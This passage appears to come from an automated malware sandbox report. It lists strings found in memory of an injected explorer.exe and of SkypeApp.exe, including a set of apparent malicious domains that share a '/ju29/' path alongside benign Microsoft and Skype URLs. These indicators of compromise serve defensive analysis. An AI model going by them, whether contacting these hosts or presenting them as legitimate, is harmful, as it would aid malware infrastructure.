          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.merchascarpamici.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.merchascarpamici.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.merchascarpamici.com/ju29/:
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.merchascarpamici.comReferer:
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnchentampere.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnchentampere.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnchentampere.com/ju29/www.bodacristianyjuani.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnchentampere.comReferer:
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/MPL/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mzfgwh.top
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mzfgwh.top/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mzfgwh.top/ju29/www.glocraze.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mzfgwh.topReferer:
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sklm888.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sklm888.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sklm888.com/ju29/www.wokeeducationhateskids.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sklm888.comReferer:
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stringtemplate.org/)
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.townstart.shop
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.townstart.shop/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.townstart.shop/ju29/www.gaming-chairs-vn-vi-2885437.fyi
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.townstart.shopReferer:
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.umertazkeer.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.umertazkeer.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.umertazkeer.com/ju29/www.mzfgwh.top
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.umertazkeer.comReferer:
          Source: SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/Public/
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3461278497.0000016D90D34000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/Public/.
          Source: SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/cldr/data/.
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3461278497.0000016D90D34000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html.
          Source: SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/reports/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wokeeducationhateskids.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wokeeducationhateskids.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wokeeducationhateskids.com/ju29/www.umertazkeer.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wokeeducationhateskids.comReferer:
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xuangesmd.com
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xuangesmd.com/ju29/
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xuangesmd.com/ju29/www.e9pf4s.top
          Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xuangesmd.comReferer:
          Source: explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/skype-coreui-sxbutton-props
          Source: SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/skype-coreui-sxcolormodels
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.googlesource.com/platform/frameworks/opt/telephony/
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.googlesource.com/platform/frameworks/support/)
          Source: explorer.exe, 00000005.00000000.1237220182.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274217256.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.asm.skype.com/v1/objects/
          Source: SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.azms.skypeassets.net/api/
          Source: explorer.exe, 00000005.00000003.3196363751.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000005.00000003.3196363751.0000000008DAD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000005.00000003.2274294266.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000005.00000000.1234977867.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
          Source: explorer.exe, 00000005.00000003.2274294266.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.dev-area.net/2015/08/13/android-4-1-enable-tls-1-1-and-tls-1-2/.
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blueimp.net
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/breakpad/breakpad/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/.
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3461278497.0000016D90D34000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/compatiblelicenses
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/android/guides/setup)
          Source: explorer.exe, 00000005.00000000.1240160729.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3741990027.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://feedback.skype.com/survey/answer/sosu
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/AzureAD/azure-activedirectory-library-for-dotnet/blob/dev/LICENSE)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/AzureAD/azure-activedirectory-library-for-js)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/BVLC/caffe)
